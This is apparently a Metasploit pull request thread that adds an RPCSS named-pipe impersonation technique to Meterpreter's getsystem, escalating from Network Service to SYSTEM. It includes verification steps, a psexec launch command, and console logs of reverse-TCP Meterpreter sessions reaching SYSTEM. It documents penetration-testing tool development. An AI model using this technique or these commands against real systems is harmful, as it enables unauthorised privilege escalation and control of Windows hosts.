New GetSystem Technique: Named Pipe Impersonation (RPCSS Variant)

[zeroSteiner]

This ports https://github.com/sailay1996/RpcSsImpersonator to Meterpreter as GetSystem technique 4. It is a riff on the classic named pipe impersonation, but instead leverages the behavior of LSASS to return the first token for a process when a specific path is used. This can be abused by processes running as Network Service to open a handle to the RPCSS service which also runs as Network Service but contains tokens for NT AUTHORITY\SYSTEM 🎉 . In order to make this more dynamic, when filtering our the token handles for the RPCSS service, I select the SYSTEM token with the most privileges (to account for filtered tokens). This should select the best / most-privileged SYSTEM token on multiple versions of Windows, instead of using the hard-coded value of 22 as described in Faxing Your Way To System.

This is the Framework side of rapid7/metasploit-payloads#431.

I also fixed a bug where the service name parameter was missing for the most common technique (1). This fixes the getsystem -t 1 command.

I tested this code in the following environments:

• Windows 8.1 Native x86
• Windows 10 WOW64
• Windows 10 Native x64

While I also tested Windows 7, the NtQueryInformationProcess command reported that the ProcessHandleInformation was unavailable by returning NT status 0xc0000003 (STATUS_INVALID_INFO_CLASS). Because of that, I pinned this to Windows versions 6.3 and newer which is Windows 8.1 / Server 2012 R2. On older systems, Meterpreter will fail with ERROR_CALL_NOT_IMPLEMENTED.

For reference on this technique:

• https://github.com/sailay1996/RpcSsImpersonator
• https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html
• https://windows-internals.com/faxing-your-way-to-system/

I also want to note that I think this escalation technique is a good candidate for incorporation into getsystem for the following reasons (as opposed to implementation as a local exploit module via an RDLL).

• Well the technique gets SYSTEM, but it does it reliably, in memory from x86 / WOW64 / x64 environments with no necessary configuration
• I don't think there will be a patch for the technique, there's no CVE assigned to it that I'm aware of and it was first published by James Forshaw a few months ago in April
• We can use the existing logic for the impersonation of named pipes that's already used by getsystem

Verification

List the steps needed to make sure this thing works

• Build the binaries from GetSystem Technique #4 (Named Pipe Impersonation RPCSS Variant) metasploit-payloads#431 and copy them to ~/.msf4/payloads/meterpreter.
• Start msfconsole and setup a handler for a native Windows Meterpreter
• Get a session running as NT AUTHORITY\NETWORK SERVICE (use these steps)
• Run getsystem, you should see that it was successful using technique 4
  • Note that running getsystem without a specific technique causes all of them to be attempted, sequentially so this also shows that the existing techniques 1-3 did not work

Demo

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444 
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (221766 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:50157) at 2020-08-20 14:31:40 -0400
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : DESKTOP-R9TM84E
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/windows
meterpreter > getsystem
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/elevator.x64.dll is being used
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter >

[gwillcox-r7]

Unassigning due to some local issues on my PC which are slowing testing of this PR. Feel free to assign this issue to someone else if I don't get back to this in time, and apologies for the delay!

[bwatters-r7]

I was not able to get the powershell magic working, so I used psexec from sysinternals. To launch the payload with nt authority/Network service just run

psexec64.exe -i -u "nt authority\network service" <payload>

When the payload calls back:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.197:4567 
[*] Sending stage (221766 bytes) to 192.168.134.174
[*] Meterpreter session 3 opened (192.168.135.197:4567 -> 192.168.134.174:50539) at 2020-09-04 14:00:08 -0500

meterpreter > sysinfo
Computer        : WIN10X64-1511
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
WARNING: Local file /home/tmoose/.msf4/payloads/meterpreter/elevator.x64.dll is being used
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

[bwatters-r7]

This looks good, but I'm going to let it hang around for a few days in hopes that @OJ drops in and gives it a once-over.

[bwatters-r7]

Release Notes:

This ports https://github.com/sailay1996/RpcSsImpersonator to Meterpreter as GetSystem technique 4. It is a riff on the classic named pipe impersonation, but instead leverages the behavior of LSASS to return the first token for a process when a specific path is used. This can be abused by processes running as Network Service to open a handle to the RPCSS service which also runs as Network Service but contains tokens for NT AUTHORITY\SYSTEM. This also includes two payload version bumps to account for (1) the payload side to implement this functionality, and a separate, unrelated PR to add a security.MD document to payloads.